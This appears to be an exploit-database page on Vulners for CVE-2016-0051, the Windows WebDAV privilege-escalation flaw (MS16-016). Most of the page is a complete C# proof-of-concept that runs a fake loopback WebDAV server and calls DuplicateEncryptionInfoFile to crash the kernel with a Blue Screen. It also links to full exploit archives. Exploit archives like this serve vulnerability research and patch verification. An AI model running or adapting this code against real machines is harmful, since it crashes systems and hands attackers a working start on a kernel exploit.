Vulners
Lucene search
Microsoft Windows WebDAV BSoD Proof Of Concept
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1) | 10 Feb 201600:00 | – | zdt |
| Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2) | 9 May 201600:00 | – | zdt |
| Microsoft Windows 7 SP1 - mrxdav.sys WebDav Privilege Escalation (MS16-016) | 11 Jul 201600:00 | – | zdt |
 | Exploit for CVE-2016-0051 | 8 May 201606:22 | – | githubexploit |
| Exploit for CVE-2016-0051 | 9 Feb 201621:30 | – | githubexploit |
 | CVE-2016-0051 | 10 Feb 201600:00 | – | circl |
 | Microsoft Windows WebDAV Elevation of Privilege Vulnerability | 11 Feb 201600:00 | – | cnvd |
 | Microsoft Windows WebDAV Client Privilege Escalation (CVE-2016-0051) | 16 Dec 202000:00 | – | checkpoint_advisories |
 | CVE-2016-0051 | 10 Feb 201611:00 | – | cve |
 | CVE-2016-0051 | 10 Feb 201611:00 | – | cvelist |
10
`/*
Source: https://github.com/koczkatamas/CVE-2016-0051
Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016).
Full Proof of Concept:
https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip
*/
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace BSoD
{
class Program
{
static void StartFakeWebDavServer(int port)
{
new Thread(() =>
{
var server = new TcpListener(IPAddress.Loopback, port);
server.Start();
while (true)
{
using (var client = server.AcceptTcpClient())
using (var stream = client.GetStream())
using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1")))
using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true })
{
Console.WriteLine(" =============== BEGIN REQUEST =============== ");
Func<string> rl = () =>
{
var line = reader.ReadLine();
Console.WriteLine("< " + line);
return line;
};
Action<string> wl = outData =>
{
Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x)));
writer.Write(outData);
};
var header = rl().Split(' ');
while (!string.IsNullOrWhiteSpace(rl())) { }
if (header[0] == "OPTIONS")
wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n");
else if (header[0] == "PROPFIND")
{
var body = String.Format(@"
<?xml version=""1.0"" encoding=""UTF-8""?>
<D:multistatus xmlns:D=""DAV:"">
<D:response>
<D:href>{0}</D:href>
<D:propstat>
<D:prop>
<D:creationdate>{1:s}Z</D:creationdate>
<D:getcontentlength>{3}</D:getcontentlength>
<D:getcontenttype>{4}</D:getcontenttype>
<D:getetag>{5}</D:getetag>
<D:getlastmodified>{6:R}</D:getlastmodified>
<D:resourcetype>{8}</D:resourcetype>
<D:supportedlock></D:supportedlock>
<D:ishidden>{7}</D:ishidden>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim();
wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body);
}
else
wl("HTTP/1.1 500 Internal Server Error\r\n\r\n");
Console.WriteLine(" =============== END REQUEST =============== ");
}
}
}) { IsBackground = true, Name = "WebDAV server thread" }.Start();
}
[StructLayout(LayoutKind.Sequential)]
private class NETRESOURCE
{
public uint dwScope = 0;
public uint dwType = 0;
public uint dwDisplayType = 0;
public uint dwUsage = 0;
public string lpLocalName = null;
public string lpRemoteName = null;
public string lpComment = null;
public string lpProvider = null;
}
[DllImport("mpr.dll")]
private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags);
[DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes);
public static void Main(string[] args)
{
var p = new Random().Next(1024, 65535);
StartFakeWebDavServer(p);
var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0);
Console.WriteLine("WNetAddConnection2 = " + addConnectionResult);
var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero);
Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult);
Console.WriteLine("BSoD did not happen.");
Console.ReadLine();
}
}
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2016 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.66115